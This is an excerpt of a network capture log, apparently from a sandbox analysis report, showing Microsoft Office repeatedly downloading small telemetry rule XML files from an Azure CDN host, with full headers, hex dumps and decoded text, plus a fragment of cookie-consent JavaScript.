                                                                                                                                                                                          2024-11-23 16:44:55 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                          Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                          2024-11-23 16:44:55 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                          Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          80192.168.2.54981213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:56 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:56 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                          ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                          x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164456Z-178bfbc474bfw4gbhC1NYCunf400000004s00000000098qp
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          81192.168.2.54981313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:56 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:56 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 432
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                          ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                          x-ms-request-id: e2b7c591-f01e-003f-257e-3bd19d000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164456Z-174c587ffdftv9hphC1TEBm29w0000000350000000007t55
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:56 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          82192.168.2.54981513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:56 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:56 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB464F255"
                                                                                                                                                                                          x-ms-request-id: 3d26e0c5-e01e-0020-6638-3cde90000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164456Z-178bfbc474bnwsh4hC1NYC2ubs00000004rg00000000fb9y
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          83192.168.2.54981413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:56 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:56 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 475
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                          ETag: "0x8DC582BBA740822"
                                                                                                                                                                                          x-ms-request-id: 925146da-101e-0034-3f87-3b96ff000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164456Z-174c587ffdf8lw6dhC1TEBkgs8000000038g000000003y8g
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:56 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          84192.168.2.54981613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:56 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:56 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                          x-ms-request-id: 3aa21312-901e-0016-730f-3defe9000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164456Z-178bfbc474bxkclvhC1NYC69g400000004k000000000hnb6
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:56 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          85192.168.2.54982613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:58 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:58 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                          x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164458Z-174c587ffdfb485jhC1TEBmc1s0000000320000000007mzn
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          86192.168.2.54982913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:58 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:59 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                          ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                          x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164459Z-178bfbc474b9fdhphC1NYCac0n00000004kg00000000fxqg
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          87192.168.2.54982713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:58 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:59 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582B984BF177"
                                                                                                                                                                                          x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164459Z-178bfbc474brk967hC1NYCfu6000000004n0000000002146
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          88192.168.2.54982813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:58 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:59 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 405
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                          ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                          x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164459Z-15b8b599d886w4hzhC1TEBb4ug00000003a00000000050qh
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
